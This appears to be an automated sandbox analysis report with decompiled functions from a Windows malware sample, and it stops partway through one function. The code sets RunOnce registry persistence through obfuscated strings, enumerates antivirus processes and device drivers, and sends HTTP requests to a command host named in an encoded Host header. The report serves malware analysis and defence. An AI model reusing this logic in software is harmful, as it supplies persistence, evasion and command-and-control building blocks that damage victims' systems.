Instruction ID: 640348aafecec9bd1ff7372f8dc493d64c17464a6ef50f8e412d5b90a2e169b5
Opcode Fuzzy Hash: 2205c7c3dedd5134c25251f5f8823b2ed953a7563fe64fb00f8c276cf95cbdee
Instruction Fuzzy Hash: 75418FB0544384CBD720DF11D44932ABFE2FB81B9DF40591CE6880B292DBBA9599CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0FE62960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0FE62960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0FE682B0( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

0x0fe6296b
0x0fe6296d
0x0fe62979
0x0fe62980
0x0fe62984
0x0fe6298c
0x0fe62993
0x0fe6299a
0x0fe629a8
0x0fe629b0
0x0fe629bd
0x0fe629c7
0x0fe629ce
0x0fe629eb
0x0fe629f8
0x0fe629ff
0x0fe62a06
0x0fe62a0d
0x0fe62a14
0x0fe62a1b
0x0fe62a22
0x0fe62a29
0x0fe62a30
0x0fe62a37
0x0fe62a3e
0x0fe62a45
0x0fe62a4c
0x0fe62a53
0x0fe62a5a
0x0fe62a61
0x0fe62a68
0x0fe62a6f
0x0fe62a76
0x0fe62a7d
0x0fe62a84
0x0fe62a8c
0x0fe62ac7
0x0fe62a8e
0x0fe62aa4
0x0fe62aaf
0x0fe62ab1
0x0fe62ab7
0x0fe62abf
0x0fe62abf

APIs

lstrlenW.KERNEL32(00520050,00000041,747582B0,00000000), ref: 0FE6299D

Part of subcall function 0FE682B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FE682CD
Part of subcall function 0FE682B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FE682FB
Part of subcall function 0FE682B0: GetModuleHandleA.KERNEL32(?), ref: 0FE6834F
Part of subcall function 0FE682B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FE6835D
Part of subcall function 0FE682B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FE6836C
Part of subcall function 0FE682B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FE683B5
Part of subcall function 0FE682B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE683C3

RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0FE62C45,00000000), ref: 0FE62A84
lstrlenW.KERNEL32(00000000), ref: 0FE62A8F
RegSetValueExW.KERNEL32(0FE62C45,00520050,00000000,00000001,00000000,00000000), ref: 0FE62AA4
RegCloseKey.KERNEL32(0FE62C45), ref: 0FE62AB1

Strings

n, xrefs: 0FE62A61
S, xrefs: 0FE629B0
n, xrefs: 0FE62A76
n, xrefs: 0FE62A45
W, xrefs: 0FE629C7
r, xrefs: 0FE62A53
w, xrefs: 0FE62A29
\, xrefs: 0FE62A30
P, xrefs: 0FE6296D
A, xrefs: 0FE6298C
i, xrefs: 0FE629F8
R, xrefs: 0FE629CE
V, xrefs: 0FE62A4C
r, xrefs: 0FE62A3E
n, xrefs: 0FE62A6F
R, xrefs: 0FE62A68
f, xrefs: 0FE62A0D
d, xrefs: 0FE62A22
\, xrefs: 0FE62A14
e, xrefs: 0FE62A7D
i, xrefs: 0FE62A5A
r, xrefs: 0FE629FF
\, xrefs: 0FE629EB
I, xrefs: 0FE62979
u, xrefs: 0FE62A37
H, xrefs: 0FE62993
U, xrefs: 0FE62984
i, xrefs: 0FE62A1B
s, xrefs: 0FE62A06
F, xrefs: 0FE629BD

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: 2f702731316032f8709e474ec7341377f7f60bff9f7d227244c6c23a050e739c
Instruction ID: 0bad865e319865c7dc768546f35a3ab8ba0e62014faf445b13f511c664c2a946
Opcode Fuzzy Hash: 2f702731316032f8709e474ec7341377f7f60bff9f7d227244c6c23a050e739c
Instruction Fuzzy Hash: 9D31DCB0D0021DDFEB20CF91E948BEEBFBAFB01749F104119D5187A281D7BA55488F54

Uniqueness

Uniqueness Score: -1.00%

Function 0FE62D30 Relevance: 56.1, APIs: 19, Strings: 13, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0FE62D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E0FE62F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0FE62C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0FE62D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E0FE62F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E0FE62F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E0FE630A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E0FE62AD0(); // executed
				goto L5;
			}

0x0fe62d39
0x0fe62d3a
0x0fe62d3d
0x0fe62d45
0x0fe62d4a
0x0fe62d52
0x0fe62d5a
0x0fe62d62
0x0fe62d67
0x0fe62d6f
0x0fe62d77
0x0fe62d7f
0x0fe62d87
0x0fe62d8e
0x0fe62de9
0x0fe62df1
0x0fe62df9
0x0fe62e01
0x0fe62e09
0x0fe62e11
0x0fe62e22
0x0fe62e26
0x0fe62e3d
0x0fe62e41
0x0fe62e49
0x0fe62e51
0x0fe62e5f
0x0fe62e68
0x0fe62e6e
0x0fe62e73
0x0fe62e7b
0x0fe62eaf
0x0fe62eb4
0x0fe62ebc
0x0fe62ec8
0x0fe62ecf
0x0fe62ee3
0x0fe62eeb
0x0fe62eee
0x0fe62eee
0x0fe62f09
0x0fe62f3d
0x0fe62f3f
0x0fe62f0b
0x0fe62f17
0x0fe62f1c
0x0fe62f25
0x00000000
0x0fe62f17
0x0fe62f09
0x0fe62ebf
0x0fe62ebf
0x0fe62e75
0x0fe62e75
0x0fe62d94
0x0fe62d9b
0x00000000
0x00000000
0x0fe62da1
0x0fe62da9
0x0fe62db1
0x0fe62db9
0x0fe62dc1
0x0fe62dc9
0x0fe62dd0
0x00000000
0x00000000
0x0fe62dd6
0x0fe62ddd
0x00000000
0x00000000
0x0fe62de3
0x0fe62de4
0x00000000

APIs

Part of subcall function 0FE62F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0FE62F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0FE62E19
LoadCursorW.USER32(00000000,00007F00), ref: 0FE62E2E
LoadIconW.USER32 ref: 0FE62E59
RegisterClassExW.USER32 ref: 0FE62E68
ExitThread.KERNEL32 ref: 0FE62E75

Part of subcall function 0FE62F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FE62F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FE62E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0FE62E81
CreateWindowExW.USER32 ref: 0FE62EA7
SetWindowLongW.USER32 ref: 0FE62EB4
ExitThread.KERNEL32 ref: 0FE62EBF

Part of subcall function 0FE62F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0FE62FA8
Part of subcall function 0FE62F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0FE62FCF
Part of subcall function 0FE62F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0FE62FE3
Part of subcall function 0FE62F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE62FFA

ExitThread.KERNEL32 ref: 0FE62F3F

Part of subcall function 0FE62AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0FE62AEA
Part of subcall function 0FE62AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FE62B2C
Part of subcall function 0FE62AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0FE62B38
Part of subcall function 0FE62AD0: ExitThread.KERNEL32 ref: 0FE62C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0FE62EC8
UpdateWindow.USER32(00000000), ref: 0FE62ECF
CreateThread.KERNEL32 ref: 0FE62EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FE62EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FE62F05
TranslateMessage.USER32(?), ref: 0FE62F1C
DispatchMessageW.USER32 ref: 0FE62F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FE62F37

Strings

@_w, xrefs: 0FE62E2E
0, xrefs: 0FE62DF1
1, xrefs: 0FE62D6F
s, xrefs: 0FE62D77
s, xrefs: 0FE62D7F
s, xrefs: 0FE62DC1
s, xrefs: 0FE62DB9
w, xrefs: 0FE62DB1
f, xrefs: 0FE62DA1
win32app, xrefs: 0FE62E51, 0FE62EA0
firefox, xrefs: 0FE62E9B
k, xrefs: 0FE62D67
d, xrefs: 0FE62DA9

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app$@_w
API String ID: 3011903443-1306002684
Opcode ID: 3d0681a1dc24368b622604ad941a26b4b841d81743e36422f162674fdd7cec42
Instruction ID: 0c0c0c474a471bf9dc364d3dfd46a9f0c3c3d3fdb860e2cc6eee4645d5fdf654
Opcode Fuzzy Hash: 3d0681a1dc24368b622604ad941a26b4b841d81743e36422f162674fdd7cec42
Instruction Fuzzy Hash: 895191B0588309AFE7109F61CC0DB4B7BE4AF45B99F10482DF684BA1C1E7B8A545CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0FE68050 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FE68050(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0FE67E40(_t64); // executed
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t62 = _t41;
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f0070;
						_v52 = 0x69006c;
						_v48 = 0x690074;
						_v44 = 0x720061;
						_v40 = 0x6d006f;
						_v36 = 0x6e0061;
						_v32 = 0x2e0061;
						_v28 = 0x690062;
						_v24 = 0x74;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63); // executed
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t40;
				}
			}

0x0fe68058
0x0fe6805b
0x0fe68060
0x0fe68063
0x0fe68063
0x0fe6806b
0x0fe68082
0x0fe68088
0x0fe6808a
0x0fe68091
0x0fe68096
0x0fe680af
0x0fe680b8
0x0fe680c0
0x0fe680c3
0x0fe680e7
0x0fe680eb
0x0fe680f8
0x0fe68101
0x0fe68108
0x0fe6810f
0x0fe68116
0x0fe6811d
0x0fe68124
0x0fe6812b
0x0fe68132
0x0fe68139
0x0fe68140
0x0fe68147
0x0fe68156
0x0fe6816d
0x0fe681bc
0x0fe6816f
0x0fe68175
0x0fe68178
0x0fe6817d
0x0fe6818c
0x0fe68190
0x0fe68190
0x0fe68195
0x00000000
0x00000000
0x0fe68197
0x0fe681a2
0x0fe681a9
0x0fe681b8
0x00000000
0x00000000
0x0fe681ba
0x00000000
0x0fe681b8
0x0fe68190
0x0fe6818c
0x0fe6816d
0x0fe68156
0x0fe681c2
0x0fe681c9
0x0fe681ce
0x0fe681da
0x0fe681e9
0x0fe6809e
0x0fe6809e
0x0fe6809e

APIs

InternetCloseHandle.WININET(?), ref: 0FE68063
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FE68082
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0FE67046,ipv4bot.whatismyipaddress.com,0FE6FF90), ref: 0FE680AF
wsprintfW.USER32 ref: 0FE680C3
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0FE680E1
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0FE6814E
HttpSendRequestW.WININET(00000000,00690074,0069006C,00000000,00000074), ref: 0FE68165
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0FE68184
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0FE681B0
GetLastError.KERNEL32 ref: 0FE681BC
InternetCloseHandle.WININET(00000000), ref: 0FE681C9
InternetCloseHandle.WININET(00000000), ref: 0FE681CE
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FE67046), ref: 0FE681DA

Strings

H, xrefs: 0FE680F8
p, xrefs: 0FE6810F
t, xrefs: 0FE68147
a, xrefs: 0FE68139
o, xrefs: 0FE6812B
:, xrefs: 0FE68108
b, xrefs: 0FE68140
s, xrefs: 0FE68101
l, xrefs: 0FE68116
a, xrefs: 0FE68124
HTTP/1.1, xrefs: 0FE680D7
a, xrefs: 0FE68132
t, xrefs: 0FE6811D

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: :$H$HTTP/1.1$a$a$a$b$l$o$p$s$t$t
API String ID: 3906118045-2187218134
Opcode ID: 59409d9213efbf7a7975eb8e33af00295f8be632100812ae5e489c8e34ce74a0
Instruction ID: ea7d9102633e513e3ff5d36bc6b886a2b2989dd1960395c19ddcd8bd86ab0b29
Opcode Fuzzy Hash: 59409d9213efbf7a7975eb8e33af00295f8be632100812ae5e489c8e34ce74a0
Instruction Fuzzy Hash: EB417271A4021CBBEB108F52DC48FAE7FB9FF05B95F14411AF914B6281C7B99950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0FE67B70 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0FE67B70(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x0fe67b8d
0x0fe67b8f
0x0fe67b9d
0x0fe67b9f
0x0fe67ba6
0x0fe67bad
0x0fe67bb4
0x0fe67bbb
0x0fe67bc2
0x0fe67bc9
0x0fe67bd0
0x0fe67bd7
0x0fe67bde
0x0fe67be5
0x0fe67bec
0x0fe67bf3
0x0fe67bfa
0x0fe67c01
0x0fe67c03
0x0fe67c05
0x0fe67c0a
0x0fe67c34
0x0fe67c3a
0x0fe67c0c
0x0fe67c10
0x0fe67c16
0x0fe67c1c
0x0fe67c22
0x0fe67c3f
0x0fe67c41
0x0fe67c43
0x0fe67c46
0x0fe67c49
0x0fe67c4c
0x0fe67c4f
0x0fe67c57
0x00000000
0x0fe67c60
0x0fe67c68
0x0fe67c70
0x0fe67c7f
0x0fe67c83
0x00000000
0x0fe67c85
0x0fe67c85
0x0fe67c85
0x0fe67ce7
0x0fe67ce7
0x0fe67cee
0x0fe67cf6
0x00000000
0x00000000
0x00000000
0x0fe67cf6
0x0fe67c8e
0x0fe67c8f
0x0fe67c91
0x0fe67c98
0x0fe67cb5
0x0fe67cbe
0x0fe67c9a
0x0fe67c9a
0x0fe67ca7
0x0fe67ca7
0x0fe67cc0
0x0fe67cde
0x0fe67ce1
0x0fe67ce4
0x00000000
0x0fe67ce4
0x0fe67d07
0x0fe67d0b
0x0fe67d0d
0x0fe67d13
0x0fe67d20
0x0fe67d20
0x0fe67d13
0x0fe67d2b
0x0fe67d2b
0x0fe67d3b
0x0fe67d40
0x0fe67d46
0x0fe67d4b
0x0fe67d55
0x0fe67d55
0x0fe67d5f
0x0fe67c24
0x0fe67c2c
0x00000000
0x0fe67c2c
0x0fe67c22

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,747166A0,?,775EC0B0), ref: 0FE67B8D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FE67C01
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FE67C16
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE67C2C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0FE67C4F
lstrcmpiW.KERNEL32(0FE703AC,-00000024), ref: 0FE67C75
Process32NextW.KERNEL32(?,?), ref: 0FE67CEE
GetLastError.KERNEL32 ref: 0FE67CF8
lstrlenW.KERNEL32(00000000), ref: 0FE67D16
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE67D3B
FindCloseChangeNotification.KERNEL32(?), ref: 0FE67D40
VirtualFree.KERNELBASE(?,?,00008000), ref: 0FE67D55

Strings

iqt, xrefs: 0FE67C75

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
String ID: iqt
API String ID: 1411803383-2805759263
Opcode ID: 5a51e74b31b102a132782d6664dda1fa98ee8464925378790e353ff164a44ac3
Instruction ID: 756e71033f37880c59993b8c41d06302028f2b253fcb88d89c20a4b8ef6976fb
Opcode Fuzzy Hash: 5a51e74b31b102a132782d6664dda1fa98ee8464925378790e353ff164a44ac3
Instruction Fuzzy Hash: 9A51AFB1D4021CABCB20CF66D849B9E7FB0FF49BA9F105069E604BB281CB746905CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0FE62AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0FE62AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
